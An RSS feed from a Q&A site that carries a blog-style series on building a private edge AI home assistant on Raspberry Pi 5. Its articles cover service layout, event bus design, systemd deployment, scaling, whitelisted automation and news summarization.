<?xml version="1.0" encoding="utf-8" standalone="no"?><rss xmlns:itunes="http://www.itunes.com/dtds/podcast-1.0.dtd" version="2.0">
<channel>
<title>Asky Q&amp;A - Recent questions</title>
<link>https://asky.uk/questions</link>
<description>Powered by Question2Answer</description>
<language>en-us</language><itunes:explicit>no</itunes:explicit><itunes:subtitle>Powered by Question2Answer</itunes:subtitle><item>
<title>Implementation Blueprint: From Architecture to a Running MVP on Raspberry Pi 5 – A Service-Oriented Layout That Avoids “Script Spaghetti”</title>
<link>https://asky.uk/123/implementation-blueprint-architecture-raspberry-spaghetti</link>
<description>&lt;p&gt;Implementation Blueprint: From Architecture to a Running MVP on Raspberry Pi 5&lt;br&gt;A Service-Oriented Layout That Avoids “Script Spaghetti”&lt;br&gt;&lt;br&gt;Introduction&lt;br&gt;The fastest way to kill an Edge AI project is to grow it as a pile of scripts. It starts as “just one Python file,” and ends as an unmaintainable system where changing one module breaks three others. This article provides a concrete implementation blueprint: directory structure, service layout, process separation, a minimal working MVP, and a clean path to run everything as Linux services on Raspberry Pi 5.&lt;br&gt;&lt;br&gt;Goals of the Blueprint&lt;br&gt;This layout optimizes for:&lt;br&gt;– clarity of responsibilities (one service = one job)&lt;br&gt;– stable interfaces between components&lt;br&gt;– deterministic startup and restart behavior&lt;br&gt;– debuggability via structured logs&lt;br&gt;– incremental expansion without rewrites&lt;br&gt;&lt;br&gt;Process Separation: What Runs Where&lt;br&gt;We separate the system into processes so that failures and resource spikes do not cascade:&lt;br&gt;1) vision_service: camera capture + face detection + embeddings + candidate identity&lt;br&gt;2) identity_service: enrollment DB + matching + confidence gating + identity state&lt;br&gt;3) scenario_service: event bus consumer + deterministic scenario selection + action requests&lt;br&gt;4) dialogue_service: STT/intent + response generation (local or API) + TTS requests&lt;br&gt;5) knowledge_service: RSS fetch + extraction + ranking + summarization + structured results&lt;br&gt;6) automation_service: email/alerts/calls/webhooks with strict whitelisting&lt;br&gt;7) api_gateway (optional MVP+): local HTTP API for admin + health checks&lt;br&gt;MVP uses only: vision_service + identity_service + scenario_service + (optional TTS stub).&lt;br&gt;&lt;br&gt;Directory Structure (Concrete)&lt;br&gt;Use a single repo with clear boundaries:&lt;br&gt;repo/&lt;br&gt;&amp;nbsp; 
README.md&lt;br&gt;&amp;nbsp; pyproject.toml&lt;br&gt;&amp;nbsp; .env.example&lt;br&gt;&amp;nbsp; configs/&lt;br&gt;&amp;nbsp; &amp;nbsp; app.yaml&lt;br&gt;&amp;nbsp; &amp;nbsp; topics.yaml&lt;br&gt;&amp;nbsp; &amp;nbsp; scenarios.yaml&lt;br&gt;&amp;nbsp; &amp;nbsp; identities.yaml&lt;br&gt;&amp;nbsp; data/&lt;br&gt;&amp;nbsp; &amp;nbsp; embeddings/&lt;br&gt;&amp;nbsp; &amp;nbsp; identities.db&lt;br&gt;&amp;nbsp; &amp;nbsp; cache/&lt;br&gt;&amp;nbsp; &amp;nbsp; logs/&lt;br&gt;&amp;nbsp; services/&lt;br&gt;&amp;nbsp; &amp;nbsp; vision_service/&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; __init__.py&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; main.py&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; camera.py&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; detect.py&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; embed.py&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; config.py&lt;br&gt;&amp;nbsp; &amp;nbsp; identity_service/&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; __init__.py&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; main.py&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; store.py&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; match.py&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; thresholds.py&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; config.py&lt;br&gt;&amp;nbsp; &amp;nbsp; scenario_service/&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; __init__.py&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; main.py&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; rules.py&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; actions.py&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; cooldowns.py&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; config.py&lt;br&gt;&amp;nbsp; &amp;nbsp; dialogue_service/&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; __init__.py&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; main.py&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; stt.py&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; intent.py&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; llm.py&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; tts.py&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; 
config.py&lt;br&gt;&amp;nbsp; &amp;nbsp; knowledge_service/&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; __init__.py&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; main.py&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; rss.py&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; extract.py&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; rank.py&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; summarize.py&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; config.py&lt;br&gt;&amp;nbsp; &amp;nbsp; automation_service/&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; __init__.py&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; main.py&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; email.py&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; notify.py&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; calls.py&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; webhooks.py&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; policy.py&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; config.py&lt;br&gt;&amp;nbsp; shared/&lt;br&gt;&amp;nbsp; &amp;nbsp; __init__.py&lt;br&gt;&amp;nbsp; &amp;nbsp; events.py&lt;br&gt;&amp;nbsp; &amp;nbsp; bus.py&lt;br&gt;&amp;nbsp; &amp;nbsp; logging.py&lt;br&gt;&amp;nbsp; &amp;nbsp; schemas.py&lt;br&gt;&amp;nbsp; &amp;nbsp; security.py&lt;br&gt;&amp;nbsp; scripts/&lt;br&gt;&amp;nbsp; &amp;nbsp; enroll_identity.py&lt;br&gt;&amp;nbsp; &amp;nbsp; test_camera.py&lt;br&gt;&amp;nbsp; &amp;nbsp; inject_event.py&lt;br&gt;&amp;nbsp; deploy/&lt;br&gt;&amp;nbsp; &amp;nbsp; systemd/&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; vision.service&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; identity.service&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; scenario.service&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; dialogue.service&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; knowledge.service&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; automation.service&lt;br&gt;&amp;nbsp; &amp;nbsp; nginx/&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; local.conf&lt;br&gt;&lt;br&gt;Rule #1: shared/ contains only “boring” cross-cutting utilities (events, logging, schemas). 
If shared grows into business logic, you are rebuilding a monolith.&lt;br&gt;&lt;br&gt;Interfaces: Event Bus First&lt;br&gt;To avoid tight coupling, services communicate through an event bus abstraction (which can start simple):&lt;br&gt;– MVP option A: local file-backed queue (simple, reliable)&lt;br&gt;– MVP option B: Redis pub/sub (cleaner, still lightweight)&lt;br&gt;– MVP option C: MQTT (good if you later add microcontrollers)&lt;br&gt;In all cases, messages are structured events:&lt;br&gt;Event = {type, timestamp, source, payload, trace_id}&lt;br&gt;&lt;br&gt;Minimal Working MVP (Day-1 Target)&lt;br&gt;MVP behavior:&lt;br&gt;1) vision_service detects a face and produces an embedding&lt;br&gt;2) identity_service matches the embedding to known identities&lt;br&gt;3) scenario_service selects a greeting scenario&lt;br&gt;4) scenario_service triggers a “speak” action (initially a stub that prints)&lt;br&gt;That’s enough to validate the full architecture loop end-to-end.&lt;br&gt;&lt;br&gt;MVP Event Flow&lt;br&gt;vision_service emits:&lt;br&gt;– FaceSeen {embedding_id, quality, bbox, cam_id}&lt;br&gt;identity_service emits:&lt;br&gt;– IdentityResolved {identity: owner|guest|unknown, name?, confidence}&lt;br&gt;scenario_service emits:&lt;br&gt;– ActionRequested {action: speak, text, voice_profile}&lt;br&gt;(automation/dialogue/knowledge can be added later without redesign.)&lt;br&gt;&lt;br&gt;Configuration Strategy (No Hardcoding)&lt;br&gt;All behavior must live in configs/:&lt;br&gt;– thresholds (recognition confidence)&lt;br&gt;– identities (enrolled people)&lt;br&gt;– scenarios (rules + priorities + cooldowns)&lt;br&gt;– topics (for the knowledge engine later)&lt;br&gt;Services read configs at startup; reloading means restarting the service. Avoid hot-reload complexity early.&lt;br&gt;&lt;br&gt;Logging and Observability&lt;br&gt;Every service logs structured JSON lines:&lt;br&gt;– timestamp, service, level, event_type, trace_id, message&lt;br&gt;Store logs in data/logs/. Prefer rotation. 
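The event schema and the JSON log format above can be combined into one small Python sketch. The dataclass fields and log keys follow the schema described here; everything else (function names, example payload) is an illustrative assumption:

```python
import json
import time
import uuid
from dataclasses import dataclass, field

@dataclass
class Event:
    # Matches the schema above: {type, timestamp, source, payload, trace_id}
    type: str
    source: str
    payload: dict
    timestamp: float = field(default_factory=time.time)
    trace_id: str = field(default_factory=lambda: uuid.uuid4().hex)

def log_json(service: str, level: str, event: Event, message: str) -> str:
    # One structured JSON line per entry, with the fields listed above.
    line = json.dumps({
        "timestamp": event.timestamp,
        "service": service,
        "level": level,
        "event_type": event.type,
        "trace_id": event.trace_id,
        "message": message,
    })
    print(line)
    return line

# Hypothetical usage: vision_service emitting a FaceSeen event.
evt = Event(type="FaceSeen", source="vision_service",
            payload={"embedding_id": "e1", "quality": 0.92})
log_json("vision_service", "INFO", evt, "face detected")
```

Because the trace_id travels inside the event, every downstream service can log it unchanged, which is what makes cross-service debugging cheap.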
A single “trace_id” per flow makes debugging easy across services.&lt;br&gt;&lt;br&gt;Running as Services (systemd)&lt;br&gt;systemd is the simplest reliable supervisor on Raspberry Pi OS.&lt;br&gt;Each service gets:&lt;br&gt;– its own user (optional but ideal)&lt;br&gt;– its own working directory&lt;br&gt;– restart on failure&lt;br&gt;– environment file for secrets&lt;br&gt;You avoid “run it in a terminal forever” operational fragility.&lt;br&gt;&lt;br&gt;Example systemd unit (Pattern)&lt;br&gt;deploy/systemd/vision.service should define:&lt;br&gt;– ExecStart: python -m services.vision_service.main&lt;br&gt;– WorkingDirectory: repo/&lt;br&gt;– Restart: on-failure&lt;br&gt;– EnvironmentFile: /etc/yourassistant/env&lt;br&gt;Repeat for identity/scenario. Start with 3 services only.&lt;br&gt;&lt;br&gt;Avoiding Script Spaghetti (Hard Rules)&lt;br&gt;1) No cross-imports between services (only shared/)&lt;br&gt;2) No hidden globals (use config objects)&lt;br&gt;3) No “just call that function” across boundaries—use events&lt;br&gt;4) One responsibility per service&lt;br&gt;5) Add features by adding modules, not by expanding main.py&lt;br&gt;If a file exceeds a few hundred lines, split it.&lt;br&gt;&lt;br&gt;Incremental Expansion Plan&lt;br&gt;After MVP:&lt;br&gt;Step 1: replace “speak stub” with a real TTS service call&lt;br&gt;Step 2: add dialogue_service for voice commands&lt;br&gt;Step 3: add knowledge_service for RSS digests&lt;br&gt;Step 4: add automation_service with strict whitelists&lt;br&gt;At every step, the event contracts remain stable.&lt;br&gt;&lt;br&gt;What Comes Next&lt;br&gt;Next article: “MVP Build Guide: Installing Dependencies, Creating the Event Bus, and Running Vision→Identity→Scenario on Raspberry Pi 5.” This will include concrete commands, minimal code skeletons, and the first runnable demo.&lt;br&gt;&lt;img alt="" src="https://miro.medium.com/v2/resize%3Afit%3A1400/1%2AvwlCwTK7Rp-S6RUZm3XaCQ.png" style="height:375px; 
width:487px"&gt;&lt;/p&gt;</description>
<category>Designing a Private Edge AI Home Assistant on Raspberry Pi 5</category>
<guid isPermaLink="true">https://asky.uk/123/implementation-blueprint-architecture-raspberry-spaghetti</guid>
<pubDate>Sun, 15 Feb 2026 10:25:03 +0000</pubDate>
</item>
<item>
<title>Future Expansion: Scaling a Personal Edge AI System – Growing Capability Without Losing Control</title>
<link>https://asky.uk/122/expansion-scaling-personal-growing-capability-without-control</link>
<description>&lt;p&gt;&lt;br&gt;&lt;br&gt;Introduction&lt;br&gt;A personal Edge AI assistant should not be a dead-end prototype. If designed correctly, it can scale in capability, coverage, and resilience without abandoning its core principles. This article outlines safe, incremental expansion paths that preserve ownership, privacy, and determinism while extending the system beyond a single device.&lt;br&gt;&lt;br&gt;Scaling Philosophy&lt;br&gt;Expansion must be additive, not transformative. New capabilities are introduced as optional modules or nodes, never by altering core trust boundaries. The original single-owner, edge-first model remains intact at all scales.&lt;br&gt;&lt;br&gt;Vertical Scaling&lt;br&gt;Vertical scaling improves what one device can do. Examples include:&lt;br&gt;– upgrading storage or cooling&lt;br&gt;– adding accelerators where available&lt;br&gt;– running additional local services&lt;br&gt;Vertical scaling is limited but simple. It preserves a single point of control and minimal network complexity.&lt;br&gt;&lt;br&gt;Horizontal Scaling&lt;br&gt;Horizontal scaling introduces additional edge nodes. These may include:&lt;br&gt;– secondary Raspberry Pi units in other rooms&lt;br&gt;– microcontrollers handling sensors or actuators&lt;br&gt;– dedicated vision or audio nodes&lt;br&gt;Each node performs narrow tasks and reports events upstream. Intelligence remains centralized or explicitly federated.&lt;br&gt;&lt;br&gt;Edge Node Roles&lt;br&gt;Expanded systems benefit from role separation:&lt;br&gt;– Perception nodes (cameras, microphones)&lt;br&gt;– Knowledge nodes (retrieval, summarization)&lt;br&gt;– Automation nodes (actuators, services)&lt;br&gt;Nodes communicate through authenticated, minimal protocols. No node shares raw data unnecessarily.&lt;br&gt;&lt;br&gt;Federated Identity Model&lt;br&gt;Identity remains owner-centric across nodes. Recognition may occur locally, but identity resolution rules are shared from the primary node. 
No node independently enrolls identities or modifies scenarios. Federation does not imply autonomy.&lt;br&gt;&lt;br&gt;Distributed Scenarios&lt;br&gt;Scenarios may trigger actions on remote nodes but are still defined centrally. Remote execution is treated as a delegated action with strict permissions and timeouts. Loss of connectivity results in graceful degradation, not autonomous behavior.&lt;br&gt;&lt;br&gt;Resilience and Fault Isolation&lt;br&gt;Multiple nodes increase resilience if designed correctly. Failure of one node must not cascade. Each node should fail silently or report errors without blocking the system. Redundancy is preferred over complexity.&lt;br&gt;&lt;br&gt;Local Models and On-Device Intelligence&lt;br&gt;Future expansion may include local language or vision models running entirely offline. Quantized or specialized models can replace external APIs selectively. The system should allow coexistence of multiple inference backends.&lt;br&gt;&lt;br&gt;Energy and Sustainability&lt;br&gt;As systems grow, energy use matters. Nodes should idle efficiently and wake only on relevant events. Low-power devices handle continuous sensing; higher-power nodes activate on demand.&lt;br&gt;&lt;br&gt;Maintenance and Upgrades&lt;br&gt;Expansion increases maintenance cost. Clear versioning, configuration management, and documentation are essential. Every node must be recoverable independently. Backups and restore procedures should be tested regularly.&lt;br&gt;&lt;br&gt;Avoiding the “Smart Home Trap”&lt;br&gt;Scaling should not turn the assistant into a generic smart home controller. The assistant remains identity- and context-driven, not rule-spaghetti automation. If expansion adds complexity without clarity, it is a regression.&lt;br&gt;&lt;br&gt;Long-Term Vision&lt;br&gt;At full maturity, the system becomes a personal edge ecosystem: multiple nodes, unified identity, controlled intelligence, and predictable behavior. 
Crucially, it remains understandable by its owner.&lt;br&gt;&lt;br&gt;Series Conclusion&lt;br&gt;This series demonstrated how to design a personal Edge AI assistant from first principles: perception without surveillance, identity without profiling, conversation without autonomy, automation without loss of control, and expansion without compromise. The result is not a product but a framework—one that any motivated enthusiast can build, inspect, and evolve at home.&lt;br&gt;&lt;img alt="" src="https://www.couchbase.com/blog/wp-content/uploads/sites/1/2024/07/Couchbase-Mobile-Overview-1.png" style="height:245px; width:465px"&gt;&lt;/p&gt;</description>
<category>Designing a Private Edge AI Home Assistant on Raspberry Pi 5</category>
<guid isPermaLink="true">https://asky.uk/122/expansion-scaling-personal-growing-capability-without-control</guid>
<pubDate>Mon, 26 Jan 2026 22:09:21 +0000</pubDate>
</item>
<item>
<title>Security, Auditing, and Ethics by Design: Building a Trustworthy Personal Edge AI System</title>
<link>https://asky.uk/121/security-auditing-ethics-design-building-trustworthy-personal</link>
<description>&lt;p&gt;Security, Auditing, and Ethics by Design&lt;br&gt;Building a Trustworthy Personal Edge AI System&lt;br&gt;&lt;img alt="" src="https://www.researchgate.net/publication/364586435/figure/fig1/AS%3A11431281222177380%401707141527854/The-Life-cycle-framework-for-the-AI-algorithm-audit.jpg" style="height:688px; width:692px"&gt;&lt;br&gt;Introduction&lt;br&gt;Security and ethics are not optional layers added at the end of development. In a personal Edge AI assistant, they define whether the system deserves trust at all. This article describes how security, auditing, and ethical constraints are embedded directly into the architecture, ensuring predictable operation.&lt;br&gt;&amp;nbsp;&lt;/p&gt;</description>
<category>Designing a Private Edge AI Home Assistant on Raspberry Pi 5</category>
<guid isPermaLink="true">https://asky.uk/121/security-auditing-ethics-design-building-trustworthy-personal</guid>
<pubDate>Thu, 22 Jan 2026 21:37:37 +0000</pubDate>
</item>
<item>
<title>Automation &amp; Services Engine: Email, Calls, and Alerts – Integrating Real-World Actions Without Losing Control</title>
<link>https://asky.uk/120/automation-services-integrating-actions-without-control</link>
<description>&lt;p&gt;Automation &amp;amp; Services Engine: Email, Calls, and Alerts&lt;br&gt;Integrating Real-World Actions Without Losing Control&lt;br&gt;&lt;img alt="" src="https://media.springernature.com/lw685/springer-static/image/art%3A10.1038%2Fs41598-025-13465-7/MediaObjects/41598_2025_13465_Fig2_HTML.png" style="height:749px; width:583px"&gt;&lt;br&gt;Introduction&lt;br&gt;The Automation &amp;amp; Services Engine bridges the assistant with the external world. It executes real actions—sending emails, issuing alerts, initiating calls—based on explicit scenarios. This engine must be powerful yet tightly constrained, ensuring that convenience never overrides safety or ownership.&lt;br&gt;&lt;br&gt;Design Philosophy&lt;br&gt;Automation is permissioned execution, not autonomous behavior. Every action must be explicitly defined, auditable, and reversible. The engine does not decide what to automate; it only executes what the Scenario Engine authorizes.&lt;br&gt;&lt;br&gt;Core Capabilities&lt;br&gt;Typical capabilities include:&lt;br&gt;– sending and reading email summaries&lt;br&gt;– pushing notifications&lt;br&gt;– initiating calls to predefined contacts or services&lt;br&gt;– triggering webhooks or local integrations&lt;br&gt;– executing emergency workflows&lt;br&gt;No capability exists unless explicitly enabled by the owner.&lt;br&gt;&lt;br&gt;Action Whitelisting&lt;br&gt;All actions are whitelisted. Each action definition specifies:&lt;br&gt;– allowed triggers&lt;br&gt;– allowed recipients or endpoints&lt;br&gt;– rate limits&lt;br&gt;– failure behavior&lt;br&gt;Actions outside the whitelist are impossible to execute.&lt;br&gt;&lt;br&gt;Email Handling&lt;br&gt;Email integration is read-first by default. The engine retrieves headers and summaries, not full bodies, unless allowed. Sending emails is restricted to predefined contacts and templates. 
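As a sketch, the whitelist described above can be a static table checked by a pure function before any action runs. All names here (the action, its fields, the example recipient) are illustrative assumptions, not the article's API:

```python
# Illustrative whitelist table; action names, fields, and recipients are assumptions.
ACTION_WHITELIST = {
    "send_email": {
        "allowed_triggers": {"daily_digest", "security_alert"},
        "allowed_recipients": {"owner@example.com"},
        "rate_limit_per_hour": 4,
    },
}

def is_action_allowed(action, trigger, recipient, sent_this_hour):
    rule = ACTION_WHITELIST.get(action)
    if rule is None:
        return False  # anything outside the whitelist is impossible to execute
    if sent_this_hour >= rule["rate_limit_per_hour"]:
        return False  # rate limits apply even to valid scenarios
    return (trigger in rule["allowed_triggers"]
            and recipient in rule["allowed_recipients"])
```

Keeping the check pure (no side effects) means it can be unit-tested exhaustively before any live credential is ever configured.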
Credentials are stored locally and scoped to minimal permissions.&lt;br&gt;&lt;br&gt;Calls and Voice Notifications&lt;br&gt;Calls are high-impact actions and require strict controls. Only predefined numbers (family, emergency services, trusted contacts) are callable. Calls are initiated only by owner-approved scenarios. Voice notifications follow scripted prompts to avoid ambiguity.&lt;br&gt;&lt;br&gt;Emergency Workflows&lt;br&gt;Emergency scenarios are explicit and rare. Examples include medical alerts or safety notifications. Such workflows bypass non-critical scenarios but never bypass identity validation. Emergency actions are logged with maximum detail.&lt;br&gt;&lt;br&gt;Rate Limiting and Cooldowns&lt;br&gt;To prevent abuse or runaway loops, all actions enforce cooldowns and rate limits. Even valid scenarios cannot trigger actions repeatedly beyond defined thresholds.&lt;br&gt;&lt;br&gt;Failure and Retry Policy&lt;br&gt;Failures are handled conservatively. Actions may retry only if explicitly configured. Silent retries are forbidden. The system prefers partial failure with notification over uncontrolled repetition.&lt;br&gt;&lt;br&gt;Security Boundaries&lt;br&gt;The Automation Engine enforces:&lt;br&gt;– no dynamic endpoint creation&lt;br&gt;– no arbitrary command execution&lt;br&gt;– no credential exposure to other engines&lt;br&gt;– no direct access from Dialogue Engine&lt;br&gt;All automation flows originate from validated scenarios only.&lt;br&gt;&lt;br&gt;Testing and Dry-Run Mode&lt;br&gt;Every action supports a dry-run mode. In this mode, actions are logged but not executed. This enables safe testing and validation before enabling live automation.&lt;br&gt;&lt;br&gt;Observability&lt;br&gt;All actions generate structured logs including timestamp, scenario ID, action type, and outcome. 
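Dry-run support and the structured action log described above fit naturally into one execution wrapper. This is a sketch; the function and field names are assumptions:

```python
import json
import time

def run_action(action: str, params: dict, scenario_id: str, dry_run: bool = True) -> dict:
    # In dry-run mode the action is logged but not executed, as described above.
    entry = {
        "timestamp": time.time(),
        "scenario_id": scenario_id,
        "action_type": action,
        "outcome": "dry_run" if dry_run else "executed",
    }
    print(json.dumps(entry))  # structured, locally reviewable log line
    if not dry_run:
        pass  # the real side effect (email, call, webhook) would happen here
    return entry
```

Defaulting dry_run to True makes live execution an explicit opt-in, which matches the conservative posture of the engine.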
Logs are local, append-only, and reviewable by the owner.&lt;br&gt;&lt;br&gt;Integration with Other Engines&lt;br&gt;The Automation Engine receives bounded instructions from the Scenario Engine and returns success or failure states. It cannot influence identity, dialogue, or scenario logic.&lt;br&gt;&lt;br&gt;What Comes Next&lt;br&gt;With automation in place, the next article focuses on System Security, Auditing, and Ethics: ensuring long-term trust, maintainability, and responsible operation of a personal Edge AI assistant.&lt;br&gt;&amp;nbsp;&lt;/p&gt;</description>
<category>Designing a Private Edge AI Home Assistant on Raspberry Pi 5</category>
<guid isPermaLink="true">https://asky.uk/120/automation-services-integrating-actions-without-control</guid>
<pubDate>Thu, 22 Jan 2026 21:23:20 +0000</pubDate>
</item>
<item>
<title>Information &amp; Knowledge Engine: News, Topics, and Personalization</title>
<link>https://asky.uk/119/information-knowledge-engine-news-topics-personalization</link>
<description>&lt;p&gt;Information &amp;amp; Knowledge Engine: News, Topics, and Personalization&lt;br&gt;Turning Data Streams into Owner-Relevant Insight&lt;br&gt;&lt;img alt="" src="https://www.sphereinc.com/wp-content/uploads/2025/05/Edge_AI_computing_How_It_Works.png" style="height:338px; width:508px"&gt;&lt;br&gt;Introduction&lt;br&gt;The Information &amp;amp; Knowledge Engine transforms raw information sources into concise, relevant insight for the owner. Its goal is not infinite search or autonomous discovery, but controlled retrieval, filtering, and summarization aligned with explicitly defined interests. This engine answers a practical question: what information is worth interrupting the owner for?&lt;br&gt;&lt;br&gt;Design Principles&lt;br&gt;The engine follows strict principles:&lt;br&gt;– owner-centric relevance&lt;br&gt;– explicit topic boundaries&lt;br&gt;– deterministic filtering&lt;br&gt;– minimal data retention&lt;br&gt;– no behavioral profiling&lt;br&gt;Information is pulled on demand or on schedule, processed locally, and presented in a compact form.&lt;br&gt;&lt;br&gt;Information Sources&lt;br&gt;Typical sources include:&lt;br&gt;– RSS feeds (news, science, technology)&lt;br&gt;– curated websites&lt;br&gt;– documentation and reference material&lt;br&gt;– optional search APIs&lt;br&gt;All sources are explicitly configured by the owner. There is no automatic source discovery.&lt;br&gt;&lt;br&gt;Topic Model&lt;br&gt;Topics define what the assistant cares about. Each topic is a static definition including:&lt;br&gt;– keywords and phrases&lt;br&gt;– trusted sources&lt;br&gt;– update frequency&lt;br&gt;– summarization depth&lt;br&gt;Examples: “Raspberry Pi”, “Edge AI”, “Space exploration”, “Medical research”. 
Topics do not evolve automatically.&lt;br&gt;&lt;br&gt;Retrieval Pipeline&lt;br&gt;The retrieval process is linear and auditable:&lt;br&gt;Source Fetch → Content Extraction → Topic Matching → Ranking → Summarization → Delivery&lt;br&gt;Each step produces intermediate results that can be logged or inspected during debugging.&lt;br&gt;&lt;br&gt;Filtering and Ranking&lt;br&gt;Filtering removes irrelevant or low-quality content early. Ranking prioritizes items based on:&lt;br&gt;– topic relevance&lt;br&gt;– source trust level&lt;br&gt;– recency&lt;br&gt;– owner-defined importance&lt;br&gt;No engagement-based or popularity-based ranking is used.&lt;br&gt;&lt;br&gt;Summarization Strategy&lt;br&gt;Summarization is concise and purpose-driven. The engine produces:&lt;br&gt;– headline&lt;br&gt;– short abstract&lt;br&gt;– optional bullet highlights&lt;br&gt;Summaries are generated locally when possible or via external APIs if explicitly allowed. Raw articles are not stored long-term.&lt;br&gt;&lt;br&gt;Personalization Without Profiling&lt;br&gt;Personalization is declarative, not inferred. The owner defines interests, preferred depth, and delivery times. The system does not learn interests implicitly from reading behavior. This avoids hidden profiling and maintains predictability.&lt;br&gt;&lt;br&gt;Delivery Modes&lt;br&gt;Information can be delivered via:&lt;br&gt;– spoken briefings&lt;br&gt;– on-demand queries&lt;br&gt;– scheduled digests&lt;br&gt;– silent notifications&lt;br&gt;Delivery mode is bound to scenarios and identity context. Owner presence overrides all other delivery rules.&lt;br&gt;&lt;br&gt;Freshness and Caching&lt;br&gt;To balance freshness and efficiency, content is cached briefly. Cache lifetimes are topic-specific and conservative. Expired data is discarded automatically. 
There is no historical content archive unless explicitly enabled by the owner.&lt;br&gt;&lt;br&gt;Failure Handling&lt;br&gt;If a source is unavailable or parsing fails, the engine degrades gracefully. Partial results are acceptable; blocking the system is not. Errors are logged without triggering retries that could cause excessive network activity.&lt;br&gt;&lt;br&gt;Security and Privacy&lt;br&gt;External requests are minimized and transparent. No tracking parameters are added. The engine never transmits identity or conversational context to external sources. Network access is strictly scoped.&lt;br&gt;&lt;br&gt;Integration with Dialogue and Scenarios&lt;br&gt;The Knowledge Engine exposes structured results to the Dialogue Engine, which formats responses according to scenario constraints. The Knowledge Engine never speaks directly and never triggers actions on its own.&lt;br&gt;&lt;br&gt;What Comes Next&lt;br&gt;With information flow under control, the next article introduces the Automation &amp;amp; Services Engine: email handling, notifications, calls, and emergency workflows—integrated safely into a personal Edge AI system.&lt;br&gt;&amp;nbsp;&lt;/p&gt;</description>
<category>Designing a Private Edge AI Home Assistant on Raspberry Pi 5</category>
<guid isPermaLink="true">https://asky.uk/119/information-knowledge-engine-news-topics-personalization</guid>
<pubDate>Mon, 19 Jan 2026 06:16:37 +0000</pubDate>
</item>
<item>
<title>Dialogue Engine: Controlled Conversation on the Edge</title>
<link>https://asky.uk/118/dialogue-engine-controlled-conversation-on-the-edge</link>
<description>&lt;p&gt;Dialogue Engine: Controlled Conversation on the Edge&lt;br&gt;Natural Interaction Without Loss of Control&lt;br&gt;&lt;br&gt;Introduction&lt;br&gt;The Dialogue Engine enables natural language interaction while enforcing strict boundaries. Its purpose is not open-ended reasoning or autonomous planning, but reliable communication within predefined limits. A well-designed Dialogue Engine feels conversational yet remains predictable, auditable, and safe.&lt;br&gt;&lt;br&gt;Design Goals&lt;br&gt;The Dialogue Engine is built to achieve:&lt;br&gt;– natural speech interaction&lt;br&gt;– identity-aware responses&lt;br&gt;– deterministic control paths&lt;br&gt;– explicit scope limitation&lt;br&gt;– graceful degradation when uncertain&lt;br&gt;Conversation quality must never compromise system safety.&lt;br&gt;&lt;br&gt;Pipeline Overview&lt;br&gt;Dialogue processing follows a linear pipeline:&lt;br&gt;Audio Input → Speech-to-Text → Intent Extraction → Context Binding → Response Generation → Text-to-Speech&lt;br&gt;Each stage has clear inputs and outputs. No stage bypasses identity or scenario constraints.&lt;br&gt;&lt;br&gt;Speech-to-Text&lt;br&gt;Speech recognition converts audio into text with confidence scores. Local models are preferred for privacy and latency; cloud-based STT may be used selectively as a fallback. Low-confidence transcripts are discarded or clarified rather than acted upon.&lt;br&gt;&lt;br&gt;Intent Extraction&lt;br&gt;Intent extraction determines what the user wants, not how to execute it. 
